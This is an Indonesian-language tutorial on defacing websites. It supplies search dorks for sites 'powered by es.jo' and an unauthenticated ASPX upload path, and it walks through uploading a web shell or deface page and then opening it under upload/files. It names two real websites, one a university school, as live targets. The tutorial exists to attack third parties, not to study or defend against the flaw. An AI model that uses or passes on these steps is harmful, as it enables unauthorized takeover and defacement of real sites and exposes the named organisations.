kali ini gw bakal kasih Tutorial Deface Poc Aspx Upload Shell
Bahan bahan:
-Dork
-Exploit
-Shell / Sc Deface
Dork :
- powered by es.jo
- inurl: powered by es.jo
- All rights Reserved. Powered by es.jo
- " powered by es.jo " ©2020
(Kembangin lagi)
Exploit:
/admin_site/upload/ahmadupload.aspx
Cara panggil/Akses:
-web.com/path/admin_site/upload/files/Shell.php
Atau
- web.com/admin_site/upload/files/Shell.php
Karna gw udah ada Live Target jadi ga usah nge dorking lagi :v
Live Target:
http://www.ahu.edu.jo/ahuschool/
https://eaiia.org/
Live target yang kedua ga bisa upload shell cuk bisanya upload sc deface :v
Oke langsung aja ke tutor nya
Pertama kalian ke web nya
Nah kalo udah hapus sisain site nya aja lalu kasih Exploit
Nah kalo vuln bakal kaya gitu ada tempat upload terus kalian upload sc deface / shell kalian di sini gw upload shell ya
Kalo udah kalian klik add yaaa gan
Nah langsung aja kalian klik upload
Kalo kaya gitu tampilan nya berarti berhasil ya gan oke kita akses shell nya kalian hapus sampe tulisan admin_site/ nah lalu kalian tambahin
upload/files/shell.php
upload/files/sc.html
Nah kan berhasil oke segitu aja tutor dari gw semoga bermanfaat
Sampe jumpa di tutor selanjutnya